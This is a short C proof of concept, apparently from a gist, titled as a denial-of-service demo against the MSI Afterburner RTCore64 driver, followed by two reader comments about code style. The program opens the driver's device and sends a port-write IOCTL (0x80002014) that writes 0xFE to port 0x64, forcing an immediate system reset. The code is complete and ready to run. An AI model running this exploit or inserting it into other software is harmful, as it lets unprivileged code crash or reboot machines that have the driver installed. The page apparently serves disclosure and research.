RTCore64 DoS Proof-of-concept

rtcore.c

#include <windows.h>
#include <cstdio>

typedef struct _RTCORE_WRITE_PORT_UCHAR {
    ULONG Port;
    ULONG Value;
} RTCORE_WRITE_PORT_UCHAR, * PRTCORE_WRITE_PORT_UCHAR;

#define KBRD_INTRFC 0x64
#define KBRD_RESET 0xFE

int main()
{
    printf_s("[!] MSI Afterburner RTCore32/64 Denial of service demo\r\n");

    HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\RTCore64"),
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        0,
        NULL);

    if (deviceHandle == INVALID_HANDLE_VALUE) {
        printf_s("[!] Unable to open device\r\n");
        return -1;
    }

    RTCORE_WRITE_PORT_UCHAR request = { 0x64, 0xFE };
    DWORD bytesReturned;

    //
    // 0x80002014 WRITE_PORT_UCHAR
    // 0x80002018 WRITE_PORT_USHORT
    // 0x8000201C WRITE_PORT_ULONG
    //

    if (!DeviceIoControl(deviceHandle,
        0x80002014,
        &request,
        sizeof(request),
        &request,
        sizeof(request),
        &bytesReturned,
        NULL))
    {
        printf_s("[!] Error output to the port\r\n");
    }

    CloseHandle(deviceHandle);
}

I'm probably mistaken as my C doesn't even qualify for a beginner level but wouldn't RTCORE_WRITE_PORT_UCHAR request = { 0x64, 0xFE }; better be written as RTCORE_WRITE_PORT_UCHAR request = { KBRD_INTRFC, KBRD_RESET };, given we define KBRD_INTRFC and KBRD_RESET?

It took me some time to find what the 0x64 and 0xFE values meant and were used for.
PS: Great blog post, thanks for it.

That's actually was a plan, but then I forgot about it. Regardless of that, it compliles to the same code as result.